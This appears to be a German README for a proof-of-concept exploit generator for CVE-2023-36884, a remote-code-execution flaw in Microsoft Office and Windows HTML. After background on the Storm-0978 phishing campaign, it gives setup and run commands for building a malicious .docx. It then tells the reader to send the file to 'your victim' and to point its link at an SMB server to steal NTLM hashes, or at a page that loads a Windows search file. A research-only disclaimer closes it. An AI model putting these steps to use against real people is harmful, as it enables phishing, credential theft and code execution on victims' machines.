
MS Office und Windows HTML RCE (CVE-2023-36884) - PoC und Exploit
Am 11. Juli 2023 veröffentlichte Microsoft einen Patch, der darauf abzielte, mehrere aktiv ausgenutzte Sicherheitslücken zur Remotecodeausführung (RCE) zu beheben. Diese Maßnahme brachte auch eine Phishing-Kampagne ans Licht, die von einem als Storm-0978 bekannten Bedrohungsakteur orchestriert wurde und gezielt Organisationen in Europa und Nordamerika angriff. Im Mittelpunkt dieser Kampagne stand eine Zero-Day-Schwachstelle mit der Bezeichnung CVE-2023-36884, die es dem Angreifer ermöglichte, Windows-Suchdateien durch sorgfältig erstellte Office Open eXtensible Markup Language (OOXML)-Dokumente mit geopolitischen Ködern im Zusammenhang mit dem Ukraine World Congress (UWC) auszunutzen. Obwohl zunächst eine Problemumgehung zur Eindämmung dieser Sicherheitslücke vorgeschlagen wurde, veröffentlichte Microsoft am 8. August 2023 ein Office Defense in Depth-Update, das die Angriffskette, die über Windows-Suchdateien (*.search-ms) zu RCE führte, effektiv unterbrach.
Dieses Exploit-Skript wurde für eine CVE-Analyse auf vsociety geschrieben.
PIP-Pakete installieren:
pip install python-docx pywin32
Eine example.html-Datei erstellen und einen Python-HTTP-Webserver starten:
New-Item -Path "example.html" - ItemType File
python -m http.server 8888
Dann das Skript ausführen:
python gen_docx_with_rtf_altchunk.py merged.docx autolinked.rtf http://localhost:8888/example.html
Die erzeugte Datei kann nun per E-Mail oder auf andere Weise mit Ihrem Opfer geteilt werden. Der Link kann auf Ihren SMB-Server verweisen, um den NTLM-Hash des Opfers zu stehlen, oder auf eine HTML-Datei, die wie in der ursprünglichen Malware einen iframe mit einem Verweis auf eine Windows-Suchdatei enthält. Aufgrund fehlender weiterer Informationen kann die genaue Ausnutzung nicht gezeigt werden.
Dieses Exploit-Skript wurde ausschließlich zu Forschungszwecken und für die Entwicklung effektiver Abwehrtechniken erstellt. Es ist nicht für böswillige oder unbefugte Aktivitäten bestimmt. Der Autor und Besitzer des Skripts lehnen jegliche Verantwortung oder Haftung für Missbrauch oder Schäden ab, die durch diese Software verursacht werden. Benutzer werden dringend gebeten, diese Software verantwortungsvoll und nur in Übereinstimmung mit den geltenden Gesetzen und Vorschriften zu verwenden. Verantwortungsvoll nutzen.